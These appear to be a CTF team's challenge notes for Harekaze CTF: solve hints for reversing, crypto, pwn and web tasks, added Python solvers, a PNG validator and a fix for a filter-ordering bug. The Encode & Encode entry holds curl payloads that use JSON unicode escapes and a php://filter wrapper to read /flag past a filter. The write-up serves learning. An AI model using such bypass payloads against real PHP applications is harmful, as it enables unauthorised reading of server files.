* DONE Welcome [Misc 10]
Solved: wasamasa
- Copy and paste that flag!
* DONE scramble [Reversing 100]
Solved: Oblivion
- ELF binary messing around with program memory
- It decompiles in Ghidra, but it's all gibberish
- Oblivion solved it with some code
* DONE ONCE UPON A TIME [Crypto 100]
Solved: WTFH4X
- Cryptosystem doing matrix multiplication with some randomization
- Given the length of the output, there are four possible ways it could
  have been created (it is built from two parts, and the randomization
  allows each of them to happen in two ways)
- I have no idea how to solve linear algebra problems :(
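The matrix step, as an added example that is not part of the team's notes or the challenge code: the chat log at the end of these notes says the cipher is matrix multiplication mod 251 and that the flag comes back by multiplying the ciphertext with the modular inverse of the key from the left and from the right, keeping whichever result is printable. The toy scheme below (a 4x4 key that multiplies the message block from a randomly chosen side, the key known to the solver) is an assumption standing in for the real one; the modular Gauss-Jordan inverse and the try-both-sides recovery are the parts that carry over.

```python
import random

P = 251  # modulus named in the chat notes
N = 4    # block dimension, constructed for this example

def mat_mul(a, b, p=P):
    """Matrix product over the integers mod p."""
    n, m, k = len(a), len(b), len(b[0])
    return [[sum(a[i][t] * b[t][j] for t in range(m)) % p for j in range(k)]
            for i in range(n)]

def mat_inv(a, p=P):
    """Gauss-Jordan elimination over GF(p); returns None if the matrix is singular."""
    n = len(a)
    aug = [list(row) + [int(i == j) for j in range(n)] for i, row in enumerate(a)]
    for col in range(n):
        pivot = next((r for r in range(col, n) if aug[r][col] % p), None)
        if pivot is None:
            return None
        aug[col], aug[pivot] = aug[pivot], aug[col]
        inv = pow(aug[col][col], -1, p)          # field inverse of the pivot
        aug[col] = [x * inv % p for x in aug[col]]
        for r in range(n):
            if r != col and aug[r][col]:
                f = aug[r][col]
                aug[r] = [(x - f * y) % p for x, y in zip(aug[r], aug[col])]
    return [row[n:] for row in aug]

def bytes_to_matrix(data, n=N):
    data = data.ljust(n * n, b" ")               # bytes are < 251, so they survive the modulus
    return [list(data[i * n:(i + 1) * n]) for i in range(n)]

def matrix_to_bytes(m):
    return bytes(x for row in m for x in row)

def random_key(rng, n=N, p=P):
    """Constructed key: keep sampling until the matrix is invertible mod p."""
    while True:
        k = [[rng.randrange(p) for _ in range(n)] for _ in range(n)]
        if mat_inv(k) is not None:
            return k

def encrypt(msg, key, rng):
    """Toy scheme (assumption): the key multiplies the block from a random side."""
    m = bytes_to_matrix(msg)
    return mat_mul(key, m) if rng.random() < 0.5 else mat_mul(m, key)

def recover(ct, key):
    """Undo the multiplication from both sides; return the candidates that are printable."""
    kinv = mat_inv(key)
    hits = []
    for cand in (mat_mul(kinv, ct), mat_mul(ct, kinv)):
        b = matrix_to_bytes(cand)
        if all(32 <= x < 127 for x in b):
            hits.append(b)
    return hits

def demo(seed=7):
    rng = random.Random(seed)
    key = random_key(rng)
    msg = b"flag{toy_matrix}"                     # constructed sample message (16 bytes)
    ct = encrypt(msg, key, rng)
    return msg, key, ct, recover(ct, key)

if __name__ == "__main__":
    msg, key, ct, found = demo()
    print("recovered:", found)
```

The ambiguity in the notes (four possible ways) collapses to trying each inverse order and filtering on printability; a wrong order gives essentially random residues mod 251, which almost never land entirely in the printable range.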
* DONE Baby ROP [Pwn 100]
Solved: semchapeu
* TODO The Steganography Generator [Reversing 200]
- Decompiles cleanly
- The Java code mutates certain pixels of the image
- It uses a bytestream composed of some magic bytes followed by the
flag
* DONE Twenty-five [Crypto 100]
Solved: wasamasa
- Goal: Translate crypto.txt to valid perl code
- I skipped frequency analysis and instead looked for unusual/unique
  words in the reserved keywords list
- =qq= is a good start; from there one can guess =qx= and continue
  until all letters are figured out
- Searching reserved.txt for patterns like =^a..b$= is the way
- Change the code to =print($text);= to see your progress and comment
out =eval($text);=
- Evaluating the fully translated code will print the flag
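The keyword-pattern approach from the notes, as an added example (not the team's solve script): a cipher word becomes a regex like =^a..b$= from the letters already known, and a candidate keyword is accepted only if it keeps the letter substitution consistent and one-to-one. The solver below repeats that until every cipher word has a single candidate. The reserved-word subset, the sample words and the random substitution key are constructed; =crypto.txt= and =reserved.txt= from the challenge are not reproduced here.

```python
import random
import string

def make_substitution(seed=25):
    """Constructed key: a random permutation of a-z (the challenge's key is not in the notes)."""
    letters = list(string.ascii_lowercase)
    rng = random.Random(seed)
    rng.shuffle(letters)
    return str.maketrans(string.ascii_lowercase, "".join(letters))

def to_regex(cword, mapping):
    """Pattern of the kind used against reserved.txt: known letters fixed, unknown ones as '.'."""
    return "^" + "".join(mapping.get(c, ".") for c in cword) + "$"

def consistent(cword, pword, mapping):
    """Could cipher word cword be plaintext pword under a one-to-one extension of mapping?"""
    if len(cword) != len(pword):
        return False
    local = dict(mapping)
    used = set(local.values())
    for c, p in zip(cword, pword):
        if c in local:
            if local[c] != p:
                return False
        elif p in used:              # plaintext letter already taken by another cipher letter
            return False
        else:
            local[c] = p
            used.add(p)
    return True

def candidates(cword, mapping, wordlist):
    return [w for w in wordlist if consistent(cword, w, mapping)]

def solve(cipher_words, wordlist):
    """Commit every cipher word that has exactly one candidate; repeat until stuck."""
    mapping = {}
    pending = list(dict.fromkeys(cipher_words))   # dedupe, keep order
    progress = True
    while pending and progress:
        progress = False
        for cword in list(pending):
            cands = candidates(cword, mapping, wordlist)
            if len(cands) == 1:
                mapping.update(zip(cword, cands[0]))
                pending.remove(cword)
                progress = True
    return mapping, pending

# Constructed subset of Perl reserved words (stand-in for reserved.txt).
RESERVED = ["print", "eval", "qq", "qx", "sub", "my", "foreach", "length",
            "push", "pop", "lc", "uc", "return", "if", "else"]
# Constructed plaintext words that the sample "crypto.txt" is made of.
PLAIN = ["qq", "qx", "print", "eval", "sub", "my", "length", "push", "return"]

def demo(seed=25):
    key = make_substitution(seed)
    cipher_words = [w.translate(key) for w in PLAIN]
    mapping, unresolved = solve(cipher_words, RESERVED)
    decoded = ["".join(mapping.get(c, "?") for c in cw) for cw in cipher_words]
    return decoded, unresolved

if __name__ == "__main__":
    print(demo())
```

The doubled-letter word is what breaks the problem open: =qq= is the only two-letter keyword with a repeated letter, and once =q= is fixed the rest propagates, which is exactly the manual process the notes describe.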
* DONE Encode & Encode [Web 100]
Solved: wasamasa
- The key insight here is that the filter check runs before JSON decoding
- So you can submit a value that does not match the filter but
  JSON-decodes into a string that exfiltrates the flag
- A second bypass is required, for this you can use the same trick to
invoke a PHP wrapper that filters output
- I picked =php://filter= to ROT13-encode the flag on its way out...
#+BEGIN_SRC shell-script
curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}' \
  http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}' \
  http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}' \
  http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}' \
  http://problem.harekaze.com:10001/query.php
#+END_SRC
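The ordering bug behind this challenge and its fix, as an added example in Python rather than the challenge's PHP (not the challenge source, whose filter is not in these notes): the vulnerable handler runs a denylist over the raw JSON text, so a =\u0066= escape never matches =flag= even though the decoded value is =/flag=; the fixed handler decodes first and then applies an allowlist check to the value it will actually use (no scheme, no absolute path, normalised path inside the web root). The denylist, the web root =/var/www/html= and the handler names are assumptions.

```python
import json
import posixpath

BASE = "/var/www/html"                 # assumed web root
BLOCKED = ("flag", "php://", "..")     # constructed denylist standing in for the challenge's filter

def handle_vulnerable(raw_body):
    """Checks the raw JSON text, then decodes: JSON \\u escapes never trip the check,
    yet the decoded string is what the application goes on to open."""
    if any(bad in raw_body for bad in BLOCKED):
        return False, None
    page = json.loads(raw_body)["page"]
    return True, page

def resolve_allowlisted(page):
    """Decode-first check on the real value: reject URL schemes and absolute paths,
    and require the normalised path to stay inside BASE."""
    if "://" in page or page.startswith("/"):
        return None
    full = posixpath.normpath(posixpath.join(BASE, page))
    if full != BASE and not full.startswith(BASE + "/"):
        return None
    return full

def handle_fixed(raw_body):
    page = json.loads(raw_body)["page"]
    full = resolve_allowlisted(page)
    return (full is not None), full

if __name__ == "__main__":
    body = r'{"page": "/\u0066lag"}'   # the escaped request from the notes
    print("vulnerable:", handle_vulnerable(body))
    print("fixed:     ", handle_fixed(body))
```

The same decode-then-validate order closes the second bypass too: once the value is decoded, =php\u003a//= is just =php://= and fails the scheme check.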
* DONE Baby ROP 2 [Pwn 200]
Solved: semchapeu
* TODO show me your private key [Crypto 200]
- I don't understand ECC at all
- I should learn some sagemath
* TODO Admin's Product key [Reversing 200]
- No clue
* TODO Login System [Pwn 200]
- semchapeu is taking this one on
* TODO Easy Notes [Web 200]
- Lots of carefully written PHP
- No obvious way to change the session contents
- I've tried to leak the environment variables instead, no luck either
- Maybe it's =$type=?
* DONE [a-z().] [Misc 200]
Solved: WTFH4X
- This one's terrible
- 1337 is 7*191
- You can obtain numbers by using =length= on an array or string
- You can obtain properties without uppercase letters
- You can call functions with 0 or 1 arguments
- I got some numbers out of this, but nothing close
- Crazy idea: Obtain running time and hope it matches eventually
- Crazy idea: Reverse DNS on a numerically represented IP address
- Neither will work because the VM namespace is seriously limited
- There are some top-level functions with short names like
  =console.log.name=
- Candidates can be obtained by pressing the tab key twice inside a
=node= REPL and testing against the VM
- You can build an algebra by using =concat= on strings and =repeat=
on lengths
- This together with a short enough primitive for 8 and 7 gives you
the following term: 7*((8+8+7)*8+7)
* DONE Now We Can Play!! [Crypto 200]
Solved: WTFH4X
- Some funky crypto exchange
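The weakness that the chat log at the end of these notes sketches for this challenge, as an added example (not the team's script and not the challenge code): the server hands back =pow(3, r, p) * flag % p= with =r= drawn from =[2**16, 2**17)=, so the randomness is only 16 bits and every candidate =r= can be tried. The prime =p= below (2^127 - 1) and the sample flag are constructed; the exponent range and generator 3 are the ones quoted in the chat. Instead of a fresh =pow= per candidate, the loop keeps =c * 3^-r= and multiplies by =3^-1= once per step.

```python
import random

P = 2**127 - 1            # constructed prime; the challenge's p is not in the notes
G = 3                     # generator quoted in the chat log
LOW, HIGH = 2**16, 2**17  # exponent range quoted in the chat log

def encrypt(flag_int, rng):
    """Toy version of the server's last step: blind the flag with G^r for a 16-bit-range r."""
    r = rng.randrange(LOW, HIGH)
    return pow(G, r, P) * flag_int % P

def to_bytes(x):
    return x.to_bytes((x.bit_length() + 7) // 8, "big")

def is_printable(x):
    b = to_bytes(x)
    return len(b) > 0 and all(32 <= ch < 127 for ch in b)

def recover(c):
    """Try every r in [LOW, HIGH) and keep the candidates that decode to printable ASCII."""
    inv_g = pow(G, -1, P)
    x = c * pow(inv_g, LOW, P) % P    # candidate plaintext for r = LOW
    hits = []
    for r in range(LOW, HIGH):
        if is_printable(x):
            hits.append((r, to_bytes(x)))
        x = x * inv_g % P             # advance to the candidate for r + 1
    return hits

def demo(seed=1):
    flag = b"flag{small_r}"           # constructed sample flag
    rng = random.Random(seed)
    c = encrypt(int.from_bytes(flag, "big"), rng)
    return flag, recover(c)

if __name__ == "__main__":
    flag, hits = demo()
    print(hits)
```

With a 127-bit modulus a wrong =r= yields a pseudo-random residue whose 16 bytes are all printable with probability around (95/256)^16, so the printable filter leaves essentially only the true flag even after 65536 trials.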
* TODO One Quadrillion [Crypto 200]
- Some unreadable hashing function
* TODO Harekaze Note [Pwn 300]
- semchapeu is taking this one on
* DONE Avatar Uploader 1 [Misc 100]
Solved: wasamasa
- The flag can be obtained by triggering an error path in the uploader
- It looks as if you just need a mangled PNG file
- This code gives you the flag:
#+BEGIN_SRC shell-script
convert xc:red -size 1x1 1x1.png
head -c20 1x1.png > broken.png
#+END_SRC
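What the twenty-byte file actually is, and how an uploader should detect it, as an added example (not the challenge's uploader code): a PNG is an 8-byte signature followed by length-prefixed, CRC-protected chunks, so =head -c20= leaves the signature, the IHDR header and four bytes of its data with no CRC and no IEND. The validator below walks the chunks, checks every CRC and requires IHDR first and IEND last, which is the check an upload handler can run before handing the file to an image library. The 1x1 PNG is built inline as a stand-in for the =convert= output, so the script runs offline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def make_png_1x1(rgb=(255, 0, 0)):
    """Constructed minimal 1x1 RGB PNG (stands in for the `convert xc:red` output)."""
    def chunk(ctype, data):
        body = ctype + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xffffffff)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB, no interlace
    raw = b"\x00" + bytes(rgb)                           # filter byte 0 followed by one pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")

def validate_png(data):
    """Return (ok, reason): walk the chunk list, verify CRCs, require IHDR first and IEND last."""
    if not data.startswith(PNG_SIG):
        return False, "bad signature"
    pos = len(PNG_SIG)
    seen = []
    while pos < len(data):
        if pos + 8 > len(data):
            return False, "truncated chunk header"
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        name = ctype.decode("latin-1")
        end = pos + 8 + length + 4                        # header + data + CRC
        if end > len(data):
            return False, f"truncated {name} chunk"
        body = data[pos + 4:pos + 8 + length]             # CRC covers type + data
        crc = struct.unpack(">I", data[pos + 8 + length:end])[0]
        if zlib.crc32(body) & 0xffffffff != crc:
            return False, f"bad CRC in {name}"
        seen.append(ctype)
        pos = end
        if ctype == b"IEND":
            break
    if not seen or seen[0] != b"IHDR":
        return False, "IHDR missing or not first"
    if seen[-1] != b"IEND":
        return False, "missing IEND"
    return True, "ok"

if __name__ == "__main__":
    png = make_png_1x1()
    print(validate_png(png))
    print(validate_png(png[:20]))   # same shape as the `head -c20` file from the notes
```

Rejecting the file up front means the error path that leaks the flag in this challenge is never reached with attacker-controlled bytes; checking CRCs also catches the subtler case of a file that is the right length but has been tampered with.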
* TODO Avatar Uploader 2 [Web 300]
- The flag is in the file system, so some exfiltration is required
* TODO Ramen [Pwn 400]
- I'll let semchapeu deal with this
* TODO SQLite Voting [Web 350]
- SQL injection, but not as we know it
- The most severe restriction is no whitespace, followed by none of
the usual characters
- You only get a binary response back
* Other
08:22 < WTFH4X> once upon a time:
08:22 < wasa> you can write it into a file
08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2
08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag
08:24 < WTFH4X> now we can play:
08:24 < WTFH4X> pass c1, c2 back to the server
08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p
08:25 < WTFH4X> just brute all values of that random
08:26 < WTFH4X> for i in xrange(2**16, 2**17): x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x)
08:26 < WTFH4X> smth like that